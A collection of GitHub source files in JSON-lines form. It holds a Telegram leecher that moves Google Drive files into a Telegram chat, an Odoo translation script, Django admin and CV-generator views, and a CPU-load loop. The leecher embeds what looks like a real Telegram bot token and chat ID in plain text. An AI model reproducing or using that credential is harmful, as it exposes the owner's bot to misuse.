try:\r\n\r\n if type == \"video\":\r\n\r\n sent = await bot.send_video(\r\n chat_id=chat_id,\r\n video=file_path,\r\n supports_streaming=True,\r\n width=480,\r\n height=320,\r\n caption=file_name,\r\n thumb=thumb_path,\r\n )\r\n\r\n elif type == \"audio\":\r\n\r\n sent = await bot.send_audio(\r\n chat_id=chat_id,\r\n audio=file_path,\r\n supports_streaming=True,\r\n caption=file_name,\r\n thumb=thumb_path,\r\n )\r\n\r\n elif type == \"document\":\r\n\r\n sent = await bot.send_document(\r\n chat_id=chat_id,\r\n document=file_path,\r\n caption=file_name,\r\n thumb=thumb_path,\r\n )\r\n\r\n elif type == \"photo\":\r\n\r\n sent = await bot.send_photo(\r\n chat_id=chat_id,\r\n photo=file_path,\r\n caption=file_name,\r\n )\r\n\r\n print(f\"\\n{file_name} Sent !\")\r\n print(f\"LOG: {sent}\")\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\n# ****************************************************************\r\n# Main Functions, function calls and variable declarations\r\n# ****************************************************************\r\n\r\n\r\n# Replace YOUR_TOKEN with your actual bot token\r\ntoken = \"5558586331:AAHcUlXjsECwp8UkreX7KgqelH0X_oXfTjc\"\r\n\r\n# Replace CHAT_ID with the chat ID of the recipient\r\nchat_id = \"-1001578391154\"\r\n\r\n# Replace FILE_PATH with the path to your media file\r\nd_path = \"/content/Downloads\"\r\n\r\nif not ospath.exists(d_path):\r\n makedirs(d_path)\r\n\r\n# Replace THUMB_PATH with the path to your thumbnail file (optional)\r\nthumb_path = \"/content/thmb.jpg\"\r\n\r\n# Create a new Telegram bot instance using the bot token\r\nbot = telegram.Bot(token=token)\r\n\r\n# create credentials object from token.pickle file\r\ncreds = None\r\nif os.path.exists(\"/content/token.pickle\"):\r\n with open(\"/content/token.pickle\", \"rb\") as token:\r\n creds = pickle.load(token)\r\nelse:\r\n exit(1)\r\n\r\n# create drive API client\r\nservice = build(\"drive\", \"v3\", credentials=creds)\r\n\r\n# enter the link for the file or folder that you want to download\r\nlink = input(\"Enter the Google Drive link for the file or folder: \")\r\n\r\nfile_id = __getIdFromUrl(link)\r\n\r\nmeta = __getFileMetadata(file_id)\r\n\r\nd_name = meta[\"name\"]\r\n\r\nd_fol_path = f\"{d_path}/{d_name}\"\r\n\r\n# Determine if the ID is of file or folder\r\nif meta.get(\"mimeType\") == \"application/vnd.google-apps.folder\":\r\n __download_folder(file_id, d_path)\r\nelse:\r\n if not ospath.exists(d_fol_path):\r\n makedirs(d_fol_path)\r\n __download_file(file_id, d_fol_path)\r\n\r\nz_file_path = create_zip(d_fol_path)\r\n\r\nshutil.rmtree(d_fol_path)\r\n\r\nleech = size_checker(z_file_path)\r\n\r\nif leech: # File was splitted\r\n\r\n if ospath.exists(z_file_path):\r\n os.remove(z_file_path) # Delete original Big Zip file\r\n print('Big Zip File Deleted !')\r\n print('\\n\\n Now uploading multiple splitted zip files.............')\r\n\r\n dir_list = os.listdir(d_fol_path)\r\n\r\n for dir_path in dir_list:\r\n\r\n short_path = os.path.join(d_fol_path,dir_path)\r\n file_type = get_file_type(short_path)\r\n file_name = os.path.basename(short_path)\r\n # print(dir_path)\r\n await upload_file(short_path,file_type,file_name)\r\n\r\nelse:\r\n\r\n print('\\nNow uploading the zip file..........................')\r\n\r\n file_type = get_file_type(z_file_path)\r\n file_name = os.path.basename(z_file_path)\r\n await upload_file(z_file_path,file_type,file_name)\r\n","repo_name":"etErn-A12l/Python-Leecher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40049411813","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAction may be:\n- Dictionary\n- PO\n- End\n- Ignore\n\"\"\"\nfrom __future__ import print_function, unicode_literals\n\nimport csv\nimport os\nimport re\nimport sys\nimport time\nfrom builtins import input\n\n# from subprocess import PIPE, Popen\n\nfrom babel.messages import pofile\nfrom openpyxl import load_workbook\n\nfrom os0 import os0\nfrom python_plus import _c\nimport makepo_it\n\ntry:\n from z0lib.z0lib import z0lib\nexcept ImportError:\n from z0lib import z0lib\ntry:\n from clodoo import clodoo\nexcept ImportError:\n import clodoo\n\n\n__version__ = \"2.0.11\"\n\nMAX_RECS = 100\nPUNCT = [' ', '.', ',', '!', ':']\nTNL_DICT = {}\nTNL_ACTION = {}\nSYNTAX = {'string': re.compile('\"([^\"\\\\\\n]|\\\\.|\\\\\\n)*\"')}\nVERSIONS = (\n '16.0',\n '15.0',\n '14.0',\n '13.0',\n '12.0',\n '11.0',\n '10.0',\n '9.0',\n '8.0',\n '7.0',\n '6.1',\n)\nPROTECT_TOKENS = [\n 'Adviser',\n 'Apply',\n 'Approve',\n 'Cancel',\n 'Close',\n 'Compute',\n 'Confirm',\n 'Cost of Revenue',\n 'Create',\n 'Currencies',\n 'Currency',\n 'Discard',\n 'Display',\n 'Dominica',\n 'done',\n 'Done',\n 'Export',\n 'Kenya',\n 'Journal',\n 'Mauritania',\n 'Myanmar',\n 'Name',\n 'Niger',\n 'Partner',\n 'Partners',\n 'Remove',\n 'Report',\n 'Run',\n 'Save',\n 'Set',\n 'The rate of the currency to the currency of rate 1',\n 'Uninstall',\n 'Update',\n (\n 'You can either upload a file from your computer or '\n 'copy/paste an internet link to your file'\n ),\n]\nmsg_time = time.time()\n\n\ndef msg_burst(text):\n global msg_time\n t = time.time() - msg_time\n if t > 3:\n print('\\t', text)\n msg_time = time.time()\n\n\ndef set_odoo_path(ctx, version):\n if ctx['pofile']:\n return os.path.abspath(\n os.path.join(\n os.path.dirname(ctx['pofile'].replace(ctx['branch'], version)), '../..'\n )\n )\n odoo_path = os.path.expanduser('~/%s' % version)\n if not os.path.exists(odoo_path):\n print('\\tPaths of Odoo %s not found' % version)\n return False\n return odoo_path\n\n\ndef change_name(ctx, filename, version):\n filename = filename.replace(ctx['odoo_ver'], version)\n majver = int(ctx['odoo_ver'].split('.')[0])\n if majver >= 10:\n filename = filename.replace('/openerp/addons/', '/odoo/addons/')\n else:\n filename = filename.replace('/odoo/addons/', '/openerp/addons/')\n return filename\n\n\ndef term_wo_punct(msgid, msgstr):\n lpunct = rpunct = ''\n while msgid and msgid[-1] in PUNCT:\n rpunct = msgid[-1] + rpunct\n if msgstr and msgid[-1] == msgstr[-1]:\n msgstr = msgstr[:-1]\n msgid = msgid[:-1]\n while msgstr and msgstr[-1] in PUNCT:\n msgstr = msgstr[:-1]\n while msgid and msgid[0] in PUNCT:\n lpunct = lpunct + msgid[0]\n if msgstr and msgid[0] == msgstr[0]:\n msgstr = msgstr[1:]\n msgid = msgid[1:]\n while msgstr and msgstr[0] in PUNCT:\n msgstr = msgstr[1:]\n if msgid and msgstr:\n caseid = 'U' if msgid[0].isupper() else 'l'\n casestr = 'U' if msgstr[0].isupper() else 'l'\n if len(msgid) > 1:\n caseid += 'U' if msgid[1].isupper() else 'l'\n if len(msgstr) > 1:\n casestr += 'U' if msgstr[1].isupper() else 'l'\n if casestr != casestr:\n if caseid == 'Ul' and casestr == 'll':\n msgstr = msgstr[0].upper() + msgstr[1:]\n elif caseid == 'll' and casestr == 'Ul':\n msgstr = msgstr[0].lower() + msgstr[1:]\n return msgid, msgstr, lpunct, rpunct\n\n\ndef term_wo_tag(msgid):\n ltag = ''\n rtag = ''\n x = re.match('<[^>]+>', msgid)\n while x:\n ltag += msgid[: x.end()]\n rtag = msgid[: x.end()].replace(\"<\", \"]+>', msgid)\n x = re.search(rtag, msgid)\n if x:\n msgid = msgid[: x.start()]\n return ltag, rtag\n\n\ndef term_with_punct(msgid, msgstr, lpunct, rpunct):\n if msgid:\n return lpunct + msgid + rpunct, lpunct + msgstr + rpunct\n return lpunct + msgstr + rpunct\n\n\ndef term_with_tag(msgstr, ltag, rtag):\n if not msgstr.endswith(rtag):\n msgstr = ltag + msgstr + rtag\n return msgstr\n\n\ndef load_default_dictionary(ctx, source):\n def process_row(ctx, module_rows, row):\n if isinstance(module_rows, list) and row['module']:\n if row['module'] == ctx['module_name']:\n module_rows.append(row)\n return 0\n if not row['msgid'] or not row['msgstr']:\n return 0\n msgid, TNL_DICT[msgid], lpunct, rpunct = term_wo_punct(\n os0.u(row['msgid']), os0.u(row['msgstr'])\n )\n if not TNL_DICT[msgid]:\n TNL_ACTION[msgid] = 'P'\n return 0\n elif msgid == TNL_DICT[msgid] or (\n msgid[0] != ' '\n and msgid[0] != '\\n'\n and msgid[0] == TNL_DICT[msgid][0].lower()\n and msgid[1:] == TNL_DICT[msgid][1:]\n ):\n TNL_ACTION[msgid] = '*'\n return 0\n if ctx['action'] and ctx['action'][0].upper() in ('D', 'P', '*'):\n TNL_ACTION[msgid] = ctx['action'][0].upper()\n else:\n TNL_ACTION[msgid] = 'D'\n return 1\n\n def read_csv(ctx, source):\n ctr = 0\n if ctx['opt_verbose']:\n print(\"\\tReading %s into dictionary\" % source)\n csv.register_dialect(\n 'dict', delimiter=_c('\\t'), quotechar=_c('\"'), quoting=csv.QUOTE_MINIMAL\n )\n csv_fd = open(source, 'rU')\n hdr_read = False\n csv_obj = csv.DictReader(\n csv_fd, fieldnames=[], restkey='undef_name', dialect='dict'\n )\n module_rows = []\n for row in csv_obj:\n if not hdr_read:\n hdr_read = True\n csv_obj.fieldnames = row['undef_name']\n continue\n ctr += process_row(ctx, module_rows, row)\n for row in module_rows:\n ctr += process_row(ctx, None, row)\n if ctx['opt_verbose']:\n print(\"\\t... Read %d records\" % ctr)\n return ctr\n\n def read_xlsx(ctx, source):\n ctr = 0\n if ctx['opt_verbose']:\n print(\"\\tReading %s into dictionary\" % source)\n wb = load_workbook(source)\n # sheet = wb.sheet_by_index(0)\n # for sheet in wb:\n # break\n sheet = wb.active\n colnames = []\n for ncol in sheet.columns:\n colnames.append(ncol[0].value)\n module_rows = []\n hdr = True\n for nrow in sheet.rows:\n if hdr:\n hdr = False\n continue\n row = {}\n for ncol, cell in enumerate(nrow):\n row[colnames[ncol]] = (\n cell.value.replace('\\\\n', '\\n') if cell.value else cell.value\n )\n ctr += process_row(ctx, module_rows, row)\n for row in module_rows:\n ctr += process_row(ctx, None, row)\n if ctx['opt_verbose']:\n print(\"\\t... Read %d records\" % ctr)\n return ctr\n\n ctr = 0\n if os.path.isfile(source + '.xlsx'):\n source = source + '.xlsx'\n ctr = read_xlsx(ctx, source)\n elif os.path.isfile(source + '.csv'):\n source = source + '.csv'\n ctr = read_csv(ctx, source)\n return ctr\n\n\ndef save_untranslated(ctx, untnl):\n csv.register_dialect(\n 'transodoo', delimiter=_c(','), quotechar=_c('\\\"'), quoting=csv.QUOTE_MINIMAL\n )\n dict_name = os.path.expanduser('~/odoo_default_tnl.csv')\n with open(dict_name, 'wb') as fd:\n writer = csv.DictWriter(\n fd, fieldnames=('module', 'msgid', 'msgstr'), dialect='transodoo'\n )\n writer.writeheader()\n if untnl is None:\n sorted_list = sorted(TNL_DICT.keys(), key=lambda x: x.lower())\n else:\n sorted_list = sorted(untnl, key=lambda x: x.lower())\n for item in sorted_list:\n msg_burst(item)\n line = {'module': '', 'msgid': os0.b(item), 'msgstr': ''}\n if untnl is None:\n line['msgstr'] = os0.b(TNL_DICT[item])\n if untnl is not None or (\n not item.startswith(' ')\n and not item.startswith('\\n')\n and not item.startswith('===')\n ):\n writer.writerow(line)\n if ctx['opt_verbose']:\n print(\"*** Untranslated dictionary saved at %s ***\" % dict_name)\n\n\ndef translate_html(ctx, msgstr):\n return msgstr\n\n\ndef load_terms_from_pofile(ctx, pofn, def_action=None):\n ctr = 0\n trline = '-' * 60\n if os.path.isfile(pofn):\n if ctx['opt_verbose']:\n print(\"\\tReading %s into dictionary\" % pofn)\n catalog = pofile.read_po(open(pofn, 'r'))\n for message in catalog:\n if not message.id:\n continue\n msgid = message.id\n msgstr = message.string\n msgid2, msgstr2, lpunct, rpunct = term_wo_punct(msgid, msgstr)\n if ctx['tnl_html']:\n msgstr = translate_html(ctx, msgstr)\n if msgid2 not in TNL_DICT:\n TNL_DICT[msgid2] = msgstr2\n TNL_ACTION[msgid2] = 'P'\n ctr += 1\n elif msgstr2 != TNL_DICT[msgid2]:\n print(' Duplicate key \"%s\"' % msgid)\n print(\n ' Dictionary=\"%s\"'\n % term_with_punct(None, TNL_DICT[msgid2], lpunct, rpunct)\n )\n print(' %-60.60s' % trline)\n print(' Po=\"%s\"' % msgstr)\n print(' %-60.60s' % trline)\n dummy = ''\n if msgid2 in PROTECT_TOKENS:\n dummy = 'D'\n elif not msgstr:\n dummy = 'D'\n elif not TNL_DICT[msgid2]:\n dummy = 'P'\n elif msgid2 in TNL_ACTION:\n dummy = TNL_ACTION[msgid2]\n elif '*' in TNL_ACTION:\n dummy = TNL_ACTION['*']\n elif def_action:\n dummy = def_action\n while dummy not in ('D', 'P', 'E', 'I') and len(dummy) <= 3:\n dummy = input('>>> (Dictionary,Po,End,Ignore,)? ')\n if dummy == 'E':\n TNL_ACTION['*'] = dummy\n return\n elif dummy == 'I':\n TNL_ACTION[msgid2] = dummy\n continue\n elif len(dummy) >= 3:\n TNL_DICT[msgid2] = os0.u(dummy)\n ctr += 1\n elif dummy == 'P':\n TNL_DICT[msgid2] = msgstr2\n ctr += 1\n print(' KEY=\"%s\"' % msgstr)\n else:\n TNL_ACTION[msgid2] = dummy\n if ctx['opt_verbose']:\n print(\"\\t... Read %d new records\" % ctr)\n return ctr\n\n\ndef parse_pofile(ctx, source, untnl):\n if os.path.isfile(source):\n ctr = 0\n if ctx['opt_verbose']:\n print(\"\\tReading %s\" % source)\n fdiff = False\n catalog = pofile.read_po(open(source, 'r'))\n for message in catalog:\n msgid = os0.u(message.id)\n msgstr = os0.u(message.string)\n msgid2, msgstr2, lpunct, rpunct = term_wo_punct(msgid, msgstr)\n ltag, rtag = term_wo_tag(msgid2)\n if lpunct or rpunct:\n msgid, msgstr = term_with_punct(msgid, msgstr, lpunct, rpunct)\n if not msgid:\n for k, value in message.__dict__.items():\n if k == 'string':\n message.string = u''\n elif value:\n setattr(message, k, value)\n ctr += 1\n elif msgid2 in TNL_DICT and msgstr != TNL_DICT[msgid2]:\n for k, value in message.__dict__.items():\n if k == 'string':\n if ltag and rtag:\n message.string = term_with_tag(TNL_DICT[msgid2], ltag, rtag)\n else:\n message.string = term_with_punct(\n None, TNL_DICT[msgid2], lpunct, rpunct\n )\n elif value:\n setattr(message, k, value)\n ctr += 1\n fdiff = True\n elif msgid and msgid2 not in TNL_DICT and msgid2 not in untnl:\n if ctx['opt_verbose']:\n print('\\tWarning: key <%s> not found in translation!' % msgid2)\n untnl[msgid2] = msgstr2\n if ctx['opt_verbose']:\n print(\"\\t... %d records to update\" % ctr)\n return fdiff, catalog, untnl\n return False, '', untnl\n\n\ndef rewrite_pofile(ctx, pofn, target, version):\n if ctx['opt_verbose']:\n print(\"\\tWriting %s \" % pofn)\n tmpfile = '%s.tmp' % pofn\n bakfile = '%s.bak' % pofn\n pofile.write_po(open(tmpfile, 'wb'), target)\n makepo_it.main(['-b', '%s' % version, '-m', '%s' % ctx['module_name'], tmpfile])\n with open(pofn, 'r') as fd:\n lefts = os0.u(fd.read()).split('\\n')\n with open(tmpfile, 'r') as fd:\n rights = os0.u(fd.read()).split('\\n')\n jj = 0\n for ii in range(len(lefts)):\n line = lefts[ii]\n if line[0:2] == '#.':\n while jj < len(rights) and rights[jj] != line:\n jj += 1\n if jj < len(rights) and rights[jj] == line:\n ii += 1\n while lefts[ii][0:2] == '#:':\n jj += 1\n rights.insert(jj, lefts[ii])\n ii += 1\n jj += 1\n with open(tmpfile, 'wb') as fd:\n fd.write(os0.b('\\n'.join(rights)))\n if os.path.isfile(bakfile):\n os.remove(bakfile)\n if os.path.isfile(pofn):\n os.rename(pofn, bakfile)\n os.rename(tmpfile, pofn)\n\n\ndef get_module_pofile_name(ctx, version):\n odoo_path = set_odoo_path(ctx, version)\n if odoo_path:\n module_path = False\n for root, _dirs, _files in os.walk(odoo_path):\n if (\n root.find('__to_remove') < 0\n and os.path.basename(root) == ctx['module_name']\n and (\n os.path.isfile(os.path.join(root, '__manifest__.py'))\n or os.path.isfile(os.path.join(root, '__openerp__.py'))\n )\n ):\n module_path = root\n break\n if not module_path:\n print(\n '*** Module %s not found for Odoo %s !!!'\n % (ctx['module_name'], version)\n )\n return False\n print('Found path %s' % module_path)\n pofn = os.path.join(module_path, 'i18n', 'it.po')\n if not os.path.isfile(pofn):\n print('*** File %s not found !!!' % pofn)\n return False\n return pofn\n return False\n\n\ndef load_dictionary(ctx):\n root = os.environ.get('HOME_DEVEL')\n if not root or not os.path.isdir(root):\n if os.path.isdir(os.path.expanduser('~/odoo/devel')):\n root = os.path.expanduser('~/odoo/devel')\n elif os.path.isdir(os.path.expanduser('~/devel')):\n root = os.path.expanduser('~/devel')\n else:\n print('Development directory ~/devel not found!')\n return 1\n if ctx['dbg_template']:\n dict_name = os.path.join(root, 'pypi', 'tools', 'odoo_default_tnl')\n else:\n dict_name = os.path.join(root, 'venv', 'bin', 'odoo_default_tnl')\n ctr = load_default_dictionary(ctx, dict_name)\n ctx['pofiles'] = {}\n ctx['ctrs'] = {'0': ctr}\n for version in VERSIONS:\n if not ctx['branch']:\n pofn = get_module_pofile_name(ctx, version)\n elif version == ctx['branch'] and ctx['pofile']:\n pofn = ctx['pofile']\n else:\n pofn = ''\n if pofn:\n ctx['pofiles'][version] = pofn\n ctr = load_terms_from_pofile(ctx, pofn)\n ctx['ctrs'][version] = ctr\n return 0\n\n\ndef refresh_dictionary(ctx):\n root = os.environ.get('HOME_DEVEL')\n if not root or not os.path.isdir(root):\n if os.path.isdir(os.path.expanduser('~/odoo/devel')):\n root = os.path.expanduser('~/odoo/devel')\n elif os.path.isdir(os.path.expanduser('~/devel')):\n root = os.path.expanduser('~/devel')\n else:\n print('Development directory ~/devel not found!')\n return 1\n dict_name = os.path.join(root, 'pypi', 'tools', 'odoo_default_tnl')\n load_default_dictionary(ctx, dict_name)\n load_terms_from_pofile(ctx, ctx['ref_pofile'], def_action=ctx['action'])\n # save_untranslated(ctx, None)\n\n\ndef set_header_pofile(ctx, pofile):\n polines = pofile.split('\\n')\n potext = ''\n for line in polines:\n if line.startswith('\"#\\t*'):\n potext += r'\"# %s\\n\"' % ctx['module_name'] + '\\n'\n elif line.startswith('\"# *'):\n potext += r'\"# %s\\n\"' % ctx['module_name'] + '\\n'\n elif line.startswith('\"Project-Id-Version:'):\n potext += r'\"Project-Id-Version: Odoo (%s)\\n\"' % ctx('branch', '') + '\\n'\n elif line.startswith('\"Last-Translator:'):\n potext += (\n r'\"Last-Translator: %s <%s>\\n\"'\n % ('Antonio M. Vigliotti', 'antoniomaria.vigliotti@gmail.com')\n + '\\n'\n )\n elif line.startswith('\"Language-Team:'):\n potext += (\n r'\"Language-Team: %s (%s)\\n\"'\n % ('Zeroincombenze', 'https://www.zeroincombenze.it/')\n + '\\n'\n )\n potext += r'\"Language: it_IT\\n\"' + '\\n'\n elif line.startswith('\"Language:'):\n pass\n elif line.startswith('\"language'):\n pass\n elif line.startswith('\"Plural-Forms:'):\n potext += r'\"Plural-Forms: nplurals=2; plural=(n != 1);\\n\"' + '\\n'\n else:\n potext += line + '\\n'\n return potext\n\n\ndef translate_module_pofile(ctx):\n untnl = {}\n for version in ctx['pofiles'].keys():\n pofn = ctx['pofiles'][version]\n fdiff, target, untnl = parse_pofile(ctx, pofn, untnl)\n src = '/%s/' % version\n tgt = '/oca%s/' % version.split('.')[0]\n oca_pofn = pofn.replace(src, tgt)\n if not os.path.isfile(oca_pofn):\n oca_pofn = oca_pofn.replace('einvoice', 'fatturapa')\n if os.path.isfile(oca_pofn):\n parse_pofile(ctx, pofn, untnl)\n if not fdiff:\n if ctx['opt_verbose']:\n print(\"No change done.\")\n else:\n rewrite_pofile(ctx, pofn, target, version)\n # save_untranslated(ctx, untnl)\n return 0\n\n\ndef connect_db(ctx):\n dbname = ''\n if ctx['branch']:\n version = ctx['branch']\n dbname = ctx['db_prefix']\n if ctx['opt_verbose']:\n print(\"\\tUpgrade DB %s\" % dbname)\n ctx['svc_protocol'] = ''\n db_found = False\n try:\n uid, ctx = clodoo.oerp_set_env(ctx=ctx, db=dbname, oe_version=version)\n db_found = True\n except BaseException:\n dbname = '%s%s' % (ctx['db_prefix'], version.split('.')[0])\n if not db_found:\n try:\n uid, ctx = clodoo.oerp_set_env(ctx=ctx, db=dbname, oe_version=version)\n db_found = True\n except BaseException:\n print(\"No DB %s found\" % ctx['db_prefix'])\n dbname = ''\n return uid, ctx, dbname\n\n\ndef upgrade_db(ctx):\n def write_tnl(ctx, model, ids, msgid, msgstr, ctr):\n if ids and len(ids) < MAX_RECS:\n for id in ids:\n try:\n clodoo.writeL8(ctx, model, id, {'value': msgstr})\n ctr += 1\n except IOError as e:\n print(\"*** Error %e writing '%s'!!!\" % (e, msgstr))\n except BaseException as e:\n print(\"*** Fatal error %s writing '%s'!!!\" % (e, msgstr))\n clodoo.unlinkL8(ctx, model, id)\n return ctr\n\n if ctx['branch']:\n uid, ctx, dbname = connect_db(ctx)\n if not dbname:\n return\n ctr = 0\n # ir.translation contains Odoo translation terms\n # @src: original (english) term\n # @source: evaluated field that seems a copy of src\n # @value: translated term\n # @name: is environment name; value may be:\n # - type model: \"model name,field name\"\n # - type code: \"source file name\", format 'addons/MODULE_PATH'\n # - type selection: \"MODULE_PATH,field name\"\n # @type: may be [code,constraint,model,selection,sql_constraint]\n # @module: module which added term\n # @state: may be [translated, to_translate]\n # @res_id: id of term means:\n # - type model: record id of model in name\n # - type code: line number in source code (in name)\n # Report translations are in ir.ui.view model\n #\n model = 'ir.translation'\n for msgid2 in TNL_DICT:\n for punct in PUNCT + ['']:\n msgid = msgid2 + punct\n msgstr = TNL_DICT[msgid2] + punct\n if ctx['opt_verbose']:\n msg_burst(msgid)\n ids = clodoo.searchL8(\n ctx,\n model,\n [\n ('lang', '=', 'it_IT'),\n ('type', '=', 'model'),\n ('src', '=', msgid),\n ('module', '=', ctx['module_name']),\n ('value', '!=', msgstr),\n ],\n )\n ctr = write_tnl(ctx, model, ids, msgid, msgstr, ctr)\n ids = clodoo.searchL8(\n ctx,\n model,\n [\n ('lang', '=', 'it_IT'),\n (\n 'name',\n 'in',\n (\n 'ir.actions.act_window,name',\n 'ir.model,name',\n 'ir.module.category,name',\n 'ir.module.module,description'\n 'ir.module.module,shortdesc',\n 'ir.module.module,summary',\n 'ir.ui.menu,name',\n 'ir.ui.view,arch_db',\n ),\n ),\n ('src', '=', msgid),\n ('value', '!=', msgstr),\n ],\n )\n ctr = write_tnl(ctx, model, ids, msgid, msgstr, ctr)\n if ctx['opt_verbose']:\n print(\"\\t... %d record upgraded\" % ctr)\n if ctx['load_language']:\n clodoo.act_install_language(ctx)\n return 0\n\n\ndef delete_translation(ctx):\n uid, ctx, dbname = connect_db(ctx)\n if not dbname:\n return 0\n if ctx['opt_verbose']:\n print(\"\\tDelete translation from DB %s\" % dbname)\n model = 'ir.translation'\n clodoo.unlinkL8(\n ctx,\n model,\n clodoo.searchL8(\n ctx, model, [('lang', '=', 'it_IT'), ('module', '=', ctx['module_name'])]\n ),\n )\n return 0\n\n\ndef main(cli_args=None):\n # if not cli_args:\n # cli_args = sys.argv[1:]\n parser = z0lib.parseoptargs(\n \"Translate Odoo Package\", \"© 2018-2023 by SHS-AV s.r.l.\", version=__version__\n )\n parser.add_argument(\n \"-A\", \"--action\", help=\"Action: Dict,Po,*\", dest=\"action\", metavar=\"name\"\n )\n parser.add_argument(\n '-B', '--debug-template', action='store_true', dest='dbg_template'\n )\n parser.add_argument(\n \"-b\", \"--branch\", help=\"Odoo branch\", dest=\"branch\", metavar=\"version\"\n )\n parser.add_argument(\n \"-c\",\n \"--config\",\n help=\"configuration file\",\n dest=\"conf_fn\",\n metavar=\"file\",\n default='./clodoo.conf',\n )\n parser.add_argument(\n '-D', '--delete-translation', action='store_true', dest='del_tnl'\n )\n parser.add_argument(\n \"-d\", \"--dbname\", help=\"DB name\", dest=\"db_prefix\", metavar=\"dbname\", default=''\n )\n parser.add_argument('-h')\n parser.add_argument('-H', '--translate-html', action='store_true', dest='tnl_html')\n parser.add_argument(\n '-l', '--load-language', action='store_true', dest='load_language'\n )\n parser.add_argument(\n '-m', '--module_name', action='store', help='filename', dest='module_name'\n )\n parser.add_argument('-n')\n parser.add_argument(\n '-p', '--pofile', action='store', help='pathname', dest='pofile'\n )\n parser.add_argument('-q')\n parser.add_argument(\n '-R', '--ref-pofile', action='store', help='pathname', dest='ref_pofile'\n )\n parser.add_argument('-V')\n parser.add_argument('-v')\n ctx = parser.parseoptargs(sys.argv[1:])\n if not ctx['module_name']:\n print('*** Missing module name! Please, use -m switch !!!')\n sys.exit(1)\n if ctx['del_tnl']:\n sys.exit(delete_translation(ctx))\n if ctx['ref_pofile']:\n sts = refresh_dictionary(ctx)\n else:\n sts = load_dictionary(ctx)\n if sts == 0:\n sts = translate_module_pofile(ctx)\n # if sts == 0 and ctx['db_prefix']:\n # sts = upgrade_db(ctx)\n sys.exit(sts)\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"zeroincombenze/tools","sub_path":"wok_code/scripts/odoo_translation_old.py","file_name":"odoo_translation_old.py","file_ext":"py","file_size_in_byte":25639,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39589298074","text":"from django.contrib import admin\n\nfrom apps.fun_time_friday.models import (\n FunTimeFridayVoiceConnect,\n FunTimeFridayVoiceDisconnect,\n)\nfrom apps.overrides.admin import AutofillCreatorModelAdmin, linkify\n\n\n@admin.register(FunTimeFridayVoiceConnect)\nclass FunTimeFridayVoiceConnectAdmin(AutofillCreatorModelAdmin):\n autocomplete_fields = [\"connector_discord\"]\n list_display = (\n \"__str__\",\n linkify(\"connector_discord\"),\n \"connected_at\",\n \"channel_name\",\n \"creator\",\n )\n list_filter = (\n \"connector_discord\",\n \"creator\",\n )\n fields = (\n \"connector_discord\",\n \"connected_at\",\n \"channel_id\",\n \"channel_name\",\n \"creator\",\n )\n\n\n@admin.register(FunTimeFridayVoiceDisconnect)\nclass FunTimeFridayVoiceDisconnectAdmin(AutofillCreatorModelAdmin):\n autocomplete_fields = [\"disconnector_discord\"]\n list_display = (\n \"__str__\",\n linkify(\"disconnector_discord\"),\n \"disconnected_at\",\n \"channel_name\",\n \"creator\",\n )\n list_filter = (\n \"disconnector_discord\",\n \"creator\",\n )\n fields = (\n \"disconnector_discord\",\n \"disconnected_at\",\n \"channel_id\",\n \"channel_name\",\n \"creator\",\n )\n","repo_name":"HaloFunTime/hft-backend","sub_path":"apps/fun_time_friday/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"3436881497","text":"from django.http import response\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import redirect, render\nfrom .models import Profile\nimport pdfkit\nfrom django.template.loader import get_template\nimport io\n\n# Create your views here.\ndef index(request):\n return render(request, 'pdf/resume.html')\n\ndef formulaire(request):\n if request.method == \"POST\":\n name = request.POST.get(\"name\") \n email = request.POST.get(\"email\") \n phone = request.POST.get(\"phone\") \n address = request.POST.get(\"address\") \n competence = request.POST.get(\"competence\")\n langue = request.POST.get(\"langue\")\n interet = request.POST.get(\"interet\") \n objectif = request.POST.get(\"objectif\") \n experience = request.POST.get(\"experience\") \n education = request.POST.get(\"education\") \n projet = request.POST.get(\"projet\")\n donnees = Profile(name=name, email=email, phone=phone, address=address, competance=competence, experience=experience, objectif=objectif, Projet=projet, interet=interet, langue=langue, education=education) \n donnees.save()\n return redirect('verification')\n return render(request, 'pdf/form.html')\n\ndef verification(request):\n profiles = Profile.objects.all()[:1]\n for profile in profiles:\n name=profile.name\n phone=profile.phone\n email =profile.email\n address =profile.address\n com = profile.competance\n langue = profile.langue\n interet = profile.interet\n exp = profile.experience\n objectif = profile.objectif \n education = profile.education \n project = profile.Projet\n return render(request, \"pdf/verification.html\", {'address':address, 'name':name, 'email':email, 'phone':phone, 'com':com, 'interet':interet, 'langue':langue, 'experience':exp, 'objectif':objectif, 'education': education, 'project':project })\n\ndef generer(request, id):\n profile = Profile.objects.get(pk=id)\n name=profile.name\n phone=profile.phone\n email =profile.email\n address =profile.address\n com = profile.competance\n langue = profile.langue\n interet = profile.interet\n exp = profile.experience\n objectif = profile.objectif \n education = profile.education \n project = profile.Projet\n\n template = get_template('pdf/generator.html')\n context = {'address':address, 'name':name, 'email':email, 'phone':phone, 'com':com, 'interet':interet, 'langue':langue, 'experience':exp, 'objectif':objectif, 'education': education, 'project':project }\n html = template.render(context)\n options = {\n 'page-size':'Letter',\n 'encoding':'UTF-8',\n }\n pdf = pdfkit.from_string(html, False, options)\n\n reponse = HttpResponse(pdf, content_type='application/pdf')\n reponse['Content-Disposition']=\"attachement\"\n return reponse\n\ndef download(request):\n profile = Profile.objects.all()\n return render(request, 'pdf/download.html', {'profile':profile}) \n\n\n","repo_name":"RomaFirst/full-stack-coding-bootcam-ppython-full-time","sub_path":"week_11/MiniProjet CV_GENRATOR/CV/pdf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18389631173","text":"# HIGH CPU UTILIZATION RUNNING ON AWS EC2 SERVER\n\nimport math\n\ndef __main__():\n x = 1\n y = 0\n z = 1\n while True:\n if x is 50000:\n x = 0\n z = 0\n y += math.sqrt(x)\n z += y\n x += 1\n print(math.sqrt(z))\n\nif __name__ == \"__main__\":\n 